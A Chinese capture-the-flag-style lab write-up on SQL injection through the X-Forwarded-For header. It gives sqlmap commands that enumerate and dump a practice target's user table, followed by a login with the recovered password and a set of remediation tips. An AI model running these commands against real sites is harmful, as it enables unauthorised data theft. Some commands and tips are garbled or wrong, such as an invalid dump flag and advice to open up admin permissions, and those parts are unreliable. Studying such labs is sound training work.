X-Forwarded-For注入漏洞

0x 00 环境介绍

靶机http://219.153.49.228:48033,通过注入完成找到网站的key。


1 |0 0x01复现过程

1.访问网站使用admin/admin登入,用burpsuite截包寻找注入点

>>截到的包,正常放包回显内容

>>加X-forwarded-for:1.1.1.1回显IP数据改变,可能存在注入点

2.保存post包进行sql注入

保存post包1.txt,加上X-forwarded-for:*作为注入点,在windows上使用sqlmap跑

暴库:python sqlmap.py -r 1.txt --dbs --batch

开始试了很多次,payload也换了几个了没成功,后来发现请求头和请求体没有分开。

>>修改后

a.暴数据库

python sqlmap.py -r 1.txt --dbs

b.暴数据表

python sqlmap.py -r 1.txt -D webcalendar --tables

c.暴列表

python sqlmap.py -r 1.txt -D webcalendar -T user --columns

d.暴字段

python sqlmap.py -r 1.txt -D webcalendar -T user "password" --dumps

3.使用admin/116012900登入拿到key:mozhebb8300a328e13dd2abd55c5d8dd


1 |1 0x02修复建议

(1)程序代码里的所有查询语句,使用标准化的数据库查询语句API接口,设定语句的参数进行过滤一些非法的字符,防止用户输入恶意的字符传入到数据库中执行sql语句。

(2)对用户提交的的参数安全过滤,像一些特殊的字符(,()*&......%#等等)进行字符转义操作,以及编码的安全转换。

(3)网站的代码层编码尽量统一,建议使用utf8编码,如果代码里的编码都不一样,会导致一些过滤被直接绕过。

(4)网站的数据类型,必须确定,是数字型,就是数字型,字符型就是字符型,数据库里的存储字段类型也设置为ini型。

(5)对用户的操作权限进行安全限制,普通用户只给普通权限,管理员后台的操作权限要放开,尽量减少对数据库的恶意攻击。

(6)网站的报错信息尽量不要返回给客户端,比如一些字符错误,数据库的报错信息,尽可能的防止泄露给客户端。


1 |2 0x03总结思考

首先通过回显页面异常找到对应的注入点,将post文件保存,然后使用sqlmap跑post包,另外请求体和请求头一定要分开。

相关推荐
fly五行2 小时前
Windows 系统下使用 Docker 安装 Milvus 向量数据库
windows·docker·milvus
hello kitty w3 小时前
Python学习(11) ----- Python的泛型
windows·python·学习
加号33 小时前
【C#】获取电脑网卡MAC地址
windows·c#
QT 小鲜肉3 小时前
【个人成长笔记】在本地Windows系统中如何正确使用adb pull命令,把Linux系统中的文件或文件夹复制到本地中(亲测有效)
linux·windows·笔记·学习·adb
newxtc4 小时前
【浙江政务服务网-注册_登录安全分析报告】
运维·selenium·安全·政务
-指短琴长-5 小时前
Docker基础【Ubuntu安装/Windows安装】
windows·ubuntu·docker
alex1007 小时前
API安全漏洞详解:Broken Function Level Authorization (BFLA) 的威胁与防御
网络·安全
shykevin7 小时前
uni-app x导航区域跳转
windows·uni-app
讨喜Dobi8 小时前
深浅复制
windows
彷徨而立9 小时前
【C/C++】只知道窗口句柄,如何擦除窗口内容,清理窗口?
c语言·c++·windows